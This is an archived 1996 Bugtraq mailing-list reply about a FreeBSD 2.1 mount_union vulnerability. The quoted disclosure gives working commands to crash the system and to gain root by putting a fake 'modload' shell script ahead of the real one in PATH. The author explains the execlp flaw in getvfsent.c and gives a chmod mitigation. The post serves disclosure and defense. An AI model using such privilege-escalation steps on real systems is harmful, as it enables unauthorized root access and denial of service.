Bugtraq mailing list archives

Re: BoS: SECURITY BUG in FreeBSD

From: root () edmweb com (Steve Reid)
Date: Fri, 17 May 1996 15:45:18 -0700


-----BEGIN PGP SIGNED MESSAGE-----

FreeBSD has a security hole...
dangerous is mount_union if suid is set
vulnerable systems are: FreeBSD 2.1 RELEASE/2.2 CURRENT
probably FreeBSD 2.1 STABLE is not vulnerable
to crash system (as a normal user) try this:
mkdir a
mkdir b
mount_union ~/a ~/b
mount_union -b ~/a ~/b


Hmm.... Needless to say, I've done a "chmod a-s /sbin/mount*" on all of
the FreeBSD machines I operate (all are 2.1.0-RELEASE with minor changes).
Ordinary users shouldn't be allowed to mount anything, anyway.

to got euid try this:
export PATH=/tmp:$PATH #if zsh, of course
echo /bin/sh >/tmp/modload
chmod +x /tmp/modload
mount_union /dir1 /dir2
and You are root!


Obviously, mount_union is depending on modload being on the $PATH, rather
than using "/sbin/modload". It seems this is not a bug in mount_union
itself, but in getvfsent.c...

/usr/src/lib/libc/gen/getvfsent.c:
[deletia]
        snprintf(name_mod, sizeof name_mod, "%s%s", name, "_mod");
        status = execlp("modload", "modload", "-e", name_mod, "-o", name_mod,
                        "-u", "-q", path, (const char *)0);

        exit(status ? errno : 0);
}
[EOF]

Clearly, execlp() should be calling modload as "/sbin/modload" instead.
Because this is a bug in getvfsent.c and not mount_union, it's possible
that other mount_* commands would have the same hole if suid root.

chmod a-s /sbin/mount*


=====================================================================
| Steve Reid - SysAdmin & Pres, EDM Web (http://www.edmweb.com/)    |
| Email: steve () edmweb com   Home Page: http://www.edmweb.com/steve/ |
| PGP (2048/9F317269) Fingerprint: 11C89D1CD67287E68C09EC52443F8830 |
|          -- Disclaimer: JMHO, YMMV, TANSTAAFL, IANAL. --          |
===================================================================:)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3ia
Charset: noconv

iQEVAwUBMZ0AvNtVWdufMXJpAQGuJwf/eJsi8NIJ7FA0v/9aG7iv/8aW7q2KT97s
zAvB744ziEpKniiPMRTfI2rhSA+a2ZjxlE4d5k1j6KfTBnEy2HICanWknvfZO7xI
jjDLTooQ+rQHeSyGpVXBmAxsb3/n9AgNIsQ6zPPZGEUiO6wsGxt1v+SIlTdBN+Ea
mHztl9vIX9JLbki8+Dv5fcmSSPTVkO1CKchP2NBEPUMUSLBkeco7QpJQwZd4g6n3
cRK9S5zXoVVSW56BHXew6WWzk8Ni/lxFlz0OcMBEpelXCY6HP1EHgSTfaJ2JEB/c
MMkNaBwLSOjAlW7x/ZA66AarW64GXMBf2Jot28knfL4j+kPoJyEMPA==
=m7Wb
-----END PGP SIGNATURE-----

Current thread:

TCP SYN probe detection tool available Doug Hughes (May 14)
- Re: TCP SYN probe detection tool available Brian Mitchell (May 15)
  - information on syslog bug wanted ALEXANDER SCHUETZ (May 17)
  - BoS: SECURITY BUG in FreeBSD Krzysztof Labanowski (May 17)
    - Re: BoS: SECURITY BUG in FreeBSD Dan Cross (May 17)
    - Re: BoS: SECURITY BUG in FreeBSD Steve Reid (May 17)
- <Possible follow-ups>
- Re: TCP SYN probe detection tool available redeye () compulink gr (May 15)
  - Re: TCP SYN probe detection tool available Casper Dik (May 16)
    - SunOS 4.1.4 fingerd Andy Dills (May 16)
    - Re: SunOS 4.1.4 fingerd Dave Dittrich (May 16)
    - Re: fingerd problems Elliot Lee (May 16)
    - Re: fingerd problems Jon Lewis (May 16)
    - Re: fingerd problems Brian Mitchell (May 16)
    - Re: fingerd problems Robert A. Pickering Jr. (May 17)
    - Re: SunOS 4.1.4 fingerd Kevin at Paranoia (May 16)
    - Re: SunOS 4.1.4 fingerd Christopher X. Candreva (May 16)

(Thread continues...)